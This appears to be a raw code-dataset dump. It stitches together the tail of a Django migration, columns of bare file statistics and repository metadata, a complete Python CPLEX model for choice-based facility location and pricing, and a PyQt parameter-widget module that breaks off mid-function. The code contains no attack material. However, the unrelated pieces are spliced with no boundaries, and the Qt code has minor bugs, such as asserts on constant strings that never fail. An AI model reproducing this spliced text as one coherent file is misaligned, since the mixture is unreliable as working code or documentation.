models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created", models.DateTimeField(auto_now_add=True)),
("updated", models.DateTimeField(auto_now=True)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
(
"financial_code_to",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="to_upload_split_file_paysplitcoefficients",
to="forecast.financialcode",
),
),
(
"financial_period",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="upload_split_file_paysplitcoefficients",
to="forecast.financialperiod",
),
),
],
options={
"permissions": [
("can_upload_percentage_files", "Can upload percentage files")
],
"abstract": False,
"unique_together": {("financial_period", "financial_code_to")},
},
),
]
| 39.46778
| 93
| 0.410836
| 1,036
| 16,537
| 6.333977
| 0.13417
| 0.023164
| 0.038403
| 0.060347
| 0.878238
| 0.868485
| 0.851417
| 0.843645
| 0.820786
| 0.795337
| 0
| 0.012842
| 0.49616
| 16,537
| 418
| 94
| 39.562201
| 0.774724
| 0.002721
| 0
| 0.807786
| 1
| 0
| 0.14621
| 0.056155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012165
| 0
| 0.021898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1dfbfdb6f5067433061ca43ed950db4cb242baf6
| 22,824
|
py
|
Python
|
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
# CPLEX model for the choice-based facility location
# and pricing problem with discrete prices (compact formulation)
# Alternatives are duplicated to account for different possible price levels.
# General
import time
import numpy as np
# CPLEX
import cplex
from cplex.exceptions import CplexSolverError
# Project
import functions
# Data
#import data_N80_I14 as data_file
import data_N08_I10 as data_file
def getModel(data):
# Initialize the model
t_in = time.time()
model = cplex.Cplex()
# Set number of threads
#model.parameters.threads.set(model.get_num_cores())
model.parameters.threads.set(1)
print('\n############\nTHREADS = ', end='')
print(model.parameters.threads.get())
print('############\n')
##########################################
##### ----- OBJECTIVE FUNCTION ----- #####
##########################################
model.objective.set_sense(model.objective.sense.maximize)
##########################################
##### ----- DECISION VARIABLES ----- #####
##########################################
# Customer choice variables
objVar = []
typeVar = []
nameVar = []
lbVar = []
ubVar = []
for i in range(data['I_tot_exp']):
for n in range(data['N']):
for r in range(data['R']):
if data['operator'][data['alt'][i]] == 1:
objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n]/data['R'])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
lbVar.append(0.0)
ubVar.append(1.0)
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
lb = [lbVar[i] for i in range(len(typeVar))],
ub = [ubVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Facility location variables
objVar = []
typeVar = []
nameVar = []
for i in range(data['I_tot_exp']):
if data['operator'][data['alt'][i]] == 1:
objVar.append(-data['fixed_cost'][data['alt'][i]])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('y[' + str(i) + ']')
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Auxiliary demand variables
typeVar = []
nameVar = []
lbVar = []
ubVar = []
for i in range(data['I_tot_exp']):
typeVar.append(model.variables.type.continuous)
nameVar.append('d[' + str(i) + ']')
lbVar.append(0.0)
ubVar.append(data['Pop'])
model.variables.add(types = [typeVar[i] for i in range(len(typeVar))],
lb = [lbVar[i] for i in range(len(typeVar))],
ub = [ubVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
print('\nCPLEX model: all decision variables added. N variables: %r. Time: %r'\
%(model.variables.get_num(), round(time.time()-t_in,2)))
# Creating a dictionary that maps variable names to indices, to speed up constraints creation
nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }
#########################################
##### -------- CONSTRAINTS -------- #####
#########################################
indicesConstr = []
coefsConstr = []
sensesConstr = []
rhsConstr = []
###################################################
### ------ Instance-specific constraints ------ ###
###################################################
### --- Instance-specific constraints on the binary variables --- ###
for i in range(data['I_out_exp']):
indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0])
sensesConstr.append('E')
rhsConstr.append(1.0)
### --- Choose at most one price level per alternative --- ###
for alt in range(data['I_opt_out'], data['I_tot']):
ind = []
co = []
for i in range(data['I_out_exp'], data['I_tot_exp']):
if data['alt'][i] == alt:
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('L')
rhsConstr.append(1.0)
###################################################
### ------------ Choice constraints ----------- ###
###################################################
# Each customer chooses one alternative
for n in range(data['N']):
for r in range(data['R']):
ind = []
co = []
for i in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('E')
rhsConstr.append(1.0)
# A customer cannot choose an alternative that is not offered
for i in range(data['I_tot_exp']):
for n in range(data['N']):
for r in range(data['R']):
indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0, -1.0])
sensesConstr.append('L')
rhsConstr.append(0.0)
# A customer chooses the alternative with the highest utility
for i in range(data['I_tot_exp']):
for n in range(data['N']):
for r in range(data['R']):
ind = []
co = []
for j in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(data['U'][j,n,r])
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(-data['U'][i,n,r])
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('G')
rhsConstr.append(0.0)
#######################################
#### ---- Auxiliary constraints --- ###
#######################################
### Calculating demands (not part of the model)
for i in range(data['I_tot_exp']):
ind = []
co = []
for n in range(data['N']):
for r in range(data['R']):
ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(-data['popN'][n]/data['R'])
ind.append(nameToIndex['d[' + str(i) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('E')
rhsConstr.append(0.0)
model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
senses = [sensesConstr[i] for i in range(len(sensesConstr))],
rhs = [rhsConstr[i] for i in range(len(rhsConstr))])
print('CPLEX model: all constraints added. N constraints: %r. Time: %r\n'\
%(model.linear_constraints.get_num(), round(time.time()-t_in,2)))
return model
def solveModel(data, model):
try:
#model.set_results_stream(None)
#model.set_warning_stream(None)
model.solve()
### PRINT OBJ FUNCTION
print('Objective function value (maximum profit): {:10.4f}'.format(model.solution.get_objective_value()))
### INITIALIZE DICTIONARY OF RESULTS AND SAVE RESULTS
results = {}
results['facilities'] = np.empty(data['I_tot_exp'])
results['demand'] = np.empty(data['I_tot_exp'])
for i in range(data['I_tot_exp']):
results['facilities'][i] = model.solution.get_values('y[' + str(i) + ']')
results['demand'][i] = model.solution.get_values('d[' + str(i) + ']')
### PRINT PRICES, DEMANDS, PROFITS
print('\nAlt Name Supplier Facility Price Demand Market share')
for i in range(data['I_tot_exp']):
print('{:3d} {:6s} {:2d} {:4.0f} {:6.4f} {:8.3f} {:7.4f}'
.format(i, data['name_mapping'][data['alt'][i]], data['operator'][data['alt'][i]],
results['facilities'][i], data['p'][i],
results['demand'][i], results['demand'][i] / data['Pop']))
return results
except CplexSolverError:
raise Exception('Exception raised during solve')
def modelOneScenario(data, r):
print('SCENARIO {:4d} '.format(r), end='')
model = cplex.Cplex()
##########################################
##### ----- OBJECTIVE FUNCTION ----- #####
##########################################
model.objective.set_sense(model.objective.sense.maximize)
##########################################
##### ----- DECISION VARIABLES ----- #####
##########################################
# Customer choice variables
objVar = []
typeVar = []
nameVar = []
lbVar = []
ubVar = []
for i in range(data['I_tot_exp']):
for n in range(data['N']):
if data['operator'][data['alt'][i]] == 1:
objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
lbVar.append(0.0)
ubVar.append(1.0)
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
lb = [lbVar[i] for i in range(len(typeVar))],
ub = [ubVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Facility location variables
objVar = []
typeVar = []
nameVar = []
for i in range(data['I_tot_exp']):
if data['operator'][data['alt'][i]] == 1:
objVar.append(-data['fixed_cost'][data['alt'][i]])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('y[' + str(i) + ']')
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Creating a dictionary that maps variable names to indices, to speed up constraints creation
nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }
#########################################
##### -------- CONSTRAINTS -------- #####
#########################################
indicesConstr = []
coefsConstr = []
sensesConstr = []
rhsConstr = []
### --- Instance-specific constraints on the binary variables --- ###
for i in range(data['I_out_exp']):
indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0])
sensesConstr.append('E')
rhsConstr.append(1.0)
for i in range(data['I_out_exp'], data['I_tot_exp']):
if data['list_open'][i] == 1:
indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0])
sensesConstr.append('E')
rhsConstr.append(1.0)
### --- Choose at most one price level per alternative --- ###
for alt in range(data['I_opt_out'], data['I_tot']):
ind = []
co = []
for i in range(data['I_out_exp'], data['I_tot_exp']):
if data['alt'][i] == alt:
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('L')
rhsConstr.append(1.0)
# Each customer chooses one alternative
for n in range(data['N']):
ind = []
co = []
for i in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('E')
rhsConstr.append(1.0)
# A customer cannot choose an alternative that is not offered
for i in range(data['I_tot_exp']):
for n in range(data['N']):
indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0, -1.0])
sensesConstr.append('L')
rhsConstr.append(0.0)
# A customer chooses the alternative with the highest utility
for i in range(data['I_tot_exp']):
for n in range(data['N']):
ind = []
co = []
for j in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(data['U'][j,n,r])
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(-data['U'][i,n,r])
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('G')
rhsConstr.append(0.0)
model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
senses = [sensesConstr[i] for i in range(len(sensesConstr))],
rhs = [rhsConstr[i] for i in range(len(rhsConstr))])
#########################################
##### ----------- SOLVE ----------- #####
#########################################
try:
model.set_results_stream(None)
#model.set_warning_stream(None)
model.parameters.timelimit.set(172000.0)
model.solve()
OF = model.solution.get_objective_value()
y = np.empty(data['I_tot_exp'])
for i in range(data['I_tot_exp']):
y[i] = model.solution.get_values('y[' + str(i) + ']')
print(' OF {:10.4f}'.format(OF))
except CplexSolverError:
raise Exception('Exception raised during solve')
return OF, y
def modelOneCustomer(data, n):
print('CUSTOMER {:4d} '.format(n), end='')
model = cplex.Cplex()
##########################################
##### ----- OBJECTIVE FUNCTION ----- #####
##########################################
model.objective.set_sense(model.objective.sense.maximize)
##########################################
##### ----- DECISION VARIABLES ----- #####
##########################################
# Customer choice variables
objVar = []
typeVar = []
nameVar = []
lbVar = []
ubVar = []
for i in range(data['I_tot_exp']):
for r in range(data['R']):
if data['operator'][data['alt'][i]] == 1:
objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n] / data['R'])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
lbVar.append(0.0)
ubVar.append(1.0)
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
lb = [lbVar[i] for i in range(len(typeVar))],
ub = [ubVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Facility location variables (fixed cost is adapted to F_i / |N|)
objVar = []
typeVar = []
nameVar = []
for i in range(data['I_tot_exp']):
if data['operator'][data['alt'][i]] == 1:
objVar.append(-data['fixed_cost'][data['alt'][i]] * data['popN'][n] / data['Pop'])
else:
objVar.append(0.0)
typeVar.append(model.variables.type.binary)
nameVar.append('y[' + str(i) + ']')
model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
types = [typeVar[i] for i in range(len(typeVar))],
names = [nameVar[i] for i in range(len(nameVar))])
# Creating a dictionary that maps variable names to indices, to speed up constraints creation
nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }
#########################################
##### -------- CONSTRAINTS -------- #####
#########################################
indicesConstr = []
coefsConstr = []
sensesConstr = []
rhsConstr = []
### --- Instance-specific constraints on the binary variables --- ###
for i in range(data['I_out_exp']):
indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0])
sensesConstr.append('E')
rhsConstr.append(1.0)
for i in range(data['I_out_exp'], data['I_tot_exp']):
if data['list_open'][i] == 1:
indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0])
sensesConstr.append('E')
rhsConstr.append(1.0)
### --- Choose at most one price level per alternative --- ###
for alt in range(data['I_opt_out'], data['I_tot']):
ind = []
co = []
for i in range(data['I_out_exp'], data['I_tot_exp']):
if data['alt'][i] == alt:
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('L')
rhsConstr.append(1.0)
# The customer chooses one alternative
for r in range(data['R']):
ind = []
co = []
for i in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(1.0)
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('E')
rhsConstr.append(1.0)
# The customer cannot choose an alternative that is not offered
for i in range(data['I_tot_exp']):
for r in range(data['R']):
indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
nameToIndex['y[' + str(i) + ']']])
coefsConstr.append([1.0, -1.0])
sensesConstr.append('L')
rhsConstr.append(0.0)
# The customer chooses the alternative with the highest utility
for i in range(data['I_tot_exp']):
for r in range(data['R']):
ind = []
co = []
for j in range(data['I_tot_exp']):
ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
co.append(data['U'][j,n,r])
ind.append(nameToIndex['y[' + str(i) + ']'])
co.append(-data['U'][i,n,r])
indicesConstr.append(ind)
coefsConstr.append(co)
sensesConstr.append('G')
rhsConstr.append(0.0)
model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
senses = [sensesConstr[i] for i in range(len(sensesConstr))],
rhs = [rhsConstr[i] for i in range(len(rhsConstr))])
#########################################
##### ----------- SOLVE ----------- #####
#########################################
try:
model.set_results_stream(None)
#model.set_warning_stream(None)
model.parameters.timelimit.set(172000.0)
model.solve()
OF = model.solution.get_objective_value()
y = np.empty(data['I_tot_exp'])
for i in range(data['I_tot_exp']):
y[i] = model.solution.get_values('y[' + str(i) + ']')
print(' OF {:10.4f}'.format(OF))
except CplexSolverError:
raise Exception('Exception raised during solve')
return OF, y
if __name__ == '__main__':
nSimulations = 1
for seed in range(1,nSimulations+1):
if nSimulations > 1:
print('\n\n\n\n\n---------\nSEED ={:3d}\n---------\n\n'.format(seed))
t_0 = time.time()
# Read instance and print aggregate customer data
data = data_file.getData(seed)
data_file.printCustomers(data)
# Calculate utilities for all alternatives (1 per discrete price)
functions.discretePriceAlternativeDuplication(data)
data_file.preprocessUtilities(data)
functions.calcDuplicatedUtilities(data)
t_1 = time.time()
#Solve choice-based optimization problem
model = getModel(data)
#model.parameters.preprocessing.presolve.set(0)
results = solveModel(data, model)
t_2 = time.time()
print('\n -- TIMING -- ')
print('Get data + Preprocess: {:10.5f} sec'.format(t_1 - t_0))
print('Run the model: {:10.5f} sec'.format(t_2 - t_1))
print('\n ------------ ')
| 38.167224
| 118
| 0.470119
| 2,462
| 22,824
| 4.290414
| 0.094639
| 0.060305
| 0.037489
| 0.06873
| 0.818896
| 0.800246
| 0.794945
| 0.794566
| 0.778377
| 0.776011
| 0
| 0.011049
| 0.314012
| 22,824
| 597
| 119
| 38.231156
| 0.663601
| 0.114266
| 0
| 0.844388
| 0
| 0.002551
| 0.087384
| 0.00379
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010204
| false
| 0
| 0.015306
| 0
| 0.035714
| 0.045918
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
698154120abee0087ee3efff678b97d65ae8d6ba
| 26,489
|
py
|
Python
|
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | 2
|
2021-07-07T13:21:11.000Z
|
2021-09-24T06:57:16.000Z
|
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | null | null | null |
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
@author: RubanSeven
@project: MirrorMirror
"""
from ..theme import *
from ..utils.layout import clear_layout
INDENT = 24
class ParamBase(object):
def __init__(self):
self.name = ''
self.type = ''
self.value_range = None
self.describe = ''
self.value = None
self.value_changed = None
def get_value(self):
return self.value
def set_value_changed_fun(self, value_changed):
self.value_changed = value_changed
class IntParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'int'
self.name = name
if type(value_range) is not tuple or len(value_range) != 2:
assert 'value_range is not tuple or length != 2'
if type(value_range[0]) is not int or type(value_range[0]) is not int:
assert 'value_range is not int tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.spin_box = None
def to_widget(self):
# 水平方向
self.spin_box = ParamSpinBox()
# 设置最小值
self.spin_box.setMinimum(self.value_range[0])
# 设置最大值
self.spin_box.setMaximum(self.value_range[1])
if self.value is None:
self.value = int(round((self.value_range[0] + self.value_range[1]) / 2.))
self.spin_box.setValue(self.value)
self.spin_box.valueChanged.connect(self.box_value_changed)
if self.name is not None:
frame = ParamFrame()
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.spin_box)
layout.addLayout(content_layout)
frame.setLayout(layout)
return frame
else:
return self.spin_box
def box_value_changed(self):
self.value = self.spin_box.value()
if self.value_changed is not None:
self.value_changed()
class FloatParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'float'
self.name = name
if type(value_range) is not tuple or len(value_range) != 2:
assert 'value_range is not tuple or length != 2'
if type(value_range[0]) is not float or type(value_range[0]) is not float:
assert 'value_range is not float tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.spin_box = None
def to_widget(self):
# 水平方向
self.spin_box = ParamDoubleSpinBox()
# 设置最小值
self.spin_box.setMinimum(self.value_range[0])
# 设置最大值
self.spin_box.setMaximum(self.value_range[1])
if self.value is None:
self.value = int(round((self.value_range[0] + self.value_range[1]) / 2.))
self.spin_box.setValue(self.value)
self.spin_box.valueChanged.connect(self.box_value_changed)
if self.name is not None:
frame = ParamFrame()
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.spin_box)
layout.addLayout(content_layout)
frame.setLayout(layout)
return frame
else:
return self.spin_box
def box_value_changed(self):
self.value = self.spin_box.value()
if self.value_changed is not None:
self.value_changed()
class IntRangeParam(ParamBase):
def __init__(self, value_ranges, default, describe='', name=None):
super().__init__()
self.type = 'IntRange'
self.name = name
if type(value_ranges) is not tuple or len(value_ranges) != 2:
assert 'value_ranges except ((a, b), (c,d))'
for value_range in value_ranges:
if type(value_range) is not tuple or len(value_range) != 2:
assert 'value_ranges except ((a, b), (c,d))'
self.value_ranges = value_ranges
self.value = default
self.describe = describe
self.__min_spin_box = None
self.__max_spin_box = None
def to_widget(self):
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
# if self.name is not None:
# layout.addSpacing(INDENT)
if self.value is None:
self.value = (int(round((self.value_ranges[0][0] + self.value_ranges[0][1]) / 2.)),
int(round((self.value_ranges[1][0] + self.value_ranges[1][1]) / 2.)))
# 水平方向
self.__min_spin_box = ParamSpinBox()
# 设置最小值
self.__min_spin_box.setMinimum(self.value_ranges[0][0])
# 设置最大值
self.__min_spin_box.setMaximum(self.value_ranges[0][1])
self.__min_spin_box.setValue(self.value[0])
self.__min_spin_box.valueChanged.connect(self.min_box_value_changed)
layout.addWidget(self.__min_spin_box)
txt_label = QLabel('至')
txt_label.setMaximumWidth(24)
layout.addWidget(txt_label)
# 水平方向
self.__max_spin_box = ParamSpinBox()
# 设置最小值
self.__max_spin_box.setMinimum(self.value_ranges[1][0])
# 设置最大值
self.__max_spin_box.setMaximum(self.value_ranges[1][1])
self.__max_spin_box.setValue(self.value[1])
self.__max_spin_box.valueChanged.connect(self.max_box_value_changed)
layout.addWidget(self.__max_spin_box)
frame = ParamFrame()
if self.name is not None:
frame_layout = QVBoxLayout()
label = LabelText(self.name)
frame_layout.addWidget(label)
frame_layout.addLayout(layout)
frame.setLayout(layout)
else:
frame.setLayout(layout)
return frame
def min_box_value_changed(self):
if self.__min_spin_box.value() >= self.value[1]:
self.__min_spin_box.setValue(self.value[0])
self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
if self.value_changed is not None:
self.value_changed()
def max_box_value_changed(self):
if self.__max_spin_box.value() <= self.value[0]:
self.__max_spin_box.setValue(self.value[1])
self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
if self.value_changed is not None:
self.value_changed()
class FloatRangeParam(ParamBase):
def __init__(self, value_ranges, default, describe='', name=None):
super().__init__()
self.type = 'FloatRange'
self.name = name
if type(value_ranges) is not tuple or len(value_ranges) != 2:
assert 'value_ranges except ((a, b), (c,d))'
for value_range in value_ranges:
if type(value_range) is not tuple or len(value_range) != 2:
assert 'value_ranges except ((a, b), (c,d))'
self.value_ranges = value_ranges
self.value = default
self.describe = describe
self.__min_spin_box = None
self.__max_spin_box = None
def to_widget(self):
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
# if self.name is not None:
# layout.addSpacing(INDENT)
if self.value is None:
self.value = (int(round((self.value_ranges[0][0] + self.value_ranges[0][1]) / 2.)),
int(round((self.value_ranges[1][0] + self.value_ranges[1][1]) / 2.)))
# 水平方向
self.__min_spin_box = ParamDoubleSpinBox()
# 设置最小值
self.__min_spin_box.setMinimum(self.value_ranges[0][0])
# 设置最大值
self.__min_spin_box.setMaximum(self.value_ranges[0][1])
self.__min_spin_box.setValue(self.value[0])
self.__min_spin_box.valueChanged.connect(self.min_box_value_changed)
layout.addWidget(self.__min_spin_box)
txt_label = QLabel('至')
txt_label.setMaximumWidth(24)
layout.addWidget(txt_label)
# 水平方向
self.__max_spin_box = ParamDoubleSpinBox()
# 设置最小值
self.__max_spin_box.setMinimum(self.value_ranges[1][0])
# 设置最大值
self.__max_spin_box.setMaximum(self.value_ranges[1][1])
self.__max_spin_box.setValue(self.value[1])
self.__max_spin_box.valueChanged.connect(self.max_box_value_changed)
layout.addWidget(self.__max_spin_box)
frame = ParamFrame()
if self.name is not None:
frame_layout = QVBoxLayout()
label = LabelText(self.name)
frame_layout.addWidget(label)
frame_layout.addLayout(layout)
frame.setLayout(frame_layout)
else:
frame.setLayout(layout)
return frame
def min_box_value_changed(self):
if self.__min_spin_box.value() >= self.value[1]:
self.__min_spin_box.setValue(self.value[0])
self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
if self.value_changed is not None:
self.value_changed()
def max_box_value_changed(self):
if self.__max_spin_box.value() <= self.value[0]:
self.__max_spin_box.setValue(self.value[1])
self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
if self.value_changed is not None:
self.value_changed()
class IntListParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'IntList'
self.name = name
if type(value_range) is not tuple:
assert 'value_range is not tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.__value_edit = None
def to_widget(self):
# 水平方向
self.__value_edit = ParamLineEdit()
if self.value is None or not self.__check_form(self.value):
self.value = ''
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
self.__value_edit.setText(self.value)
self.__value_edit.textChanged.connect(self.text_changed)
if self.name is not None:
frame = ParamFrame()
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.__value_edit)
layout.addLayout(content_layout)
frame.setLayout(layout)
return frame
else:
return self.__value_edit
@staticmethod
def __check_form(txt: str):
try:
for i in txt.split(','):
try:
int(i)
except:
return False
except:
return False
return True
def text_changed(self):
if self.__check_form(self.__value_edit.text()):
self.value = self.__value_edit.text()
if self.value_changed is not None:
self.value_changed()
def get_value(self):
return [int(i) for i in self.value.split(',')]
class FloatListParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'FloatList'
self.name = name
if type(value_range) is not tuple:
assert 'value_range is not tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.__value_edit = None
def to_widget(self):
# 水平方向
self.__value_edit = ParamLineEdit()
if self.value is None or not self.__check_form(self.value):
self.value = ''
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
self.__value_edit.setText(self.value)
self.__value_edit.textChanged.connect(self.text_changed)
if self.name is not None:
frame = ParamFrame()
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
content_layout.setContentsMargins(0, 0, 0, 0)
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.__value_edit)
layout.addLayout(content_layout)
frame.setLayout(layout)
return frame
else:
return self.__value_edit
@staticmethod
def __check_form(txt: str):
try:
for i in txt.split(','):
try:
float(i)
except:
return False
except:
return False
return True
def text_changed(self):
if self.__check_form(self.__value_edit.text()):
self.value = self.__value_edit.text()
if self.value_changed is not None:
self.value_changed()
def get_value(self):
return [float(i) for i in self.value.split(',')]
class EnumListParam(ParamBase):
def __init__(self, value_range, default, describe='', name=None):
super().__init__()
self.type = 'EnumFloatList'
self.name = name
if type(value_range) is not tuple:
assert 'value_range is not tuple'
self.value_range = value_range
self.describe = describe
self.value = default
self.__value_edit = None
def to_widget(self):
# 水平方向
self.__value_edit = QLineEdit()
if self.value is None or not self.__check_form(self.value):
self.value = ''
# value_idx = self.value_range.index(self.value)
# self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
self.__value_edit.setText(self.value)
self.__value_edit.textChanged.connect(self.text_changed)
if self.name is not None:
frame = ParamFrame()
layout = QVBoxLayout()
label = LabelText(self.name)
layout.addWidget(label)
content_layout = QHBoxLayout()
# content_layout.addSpacing(INDENT)
content_layout.addWidget(self.__value_edit)
layout.addLayout(content_layout)
frame.setLayout(layout)
return frame
else:
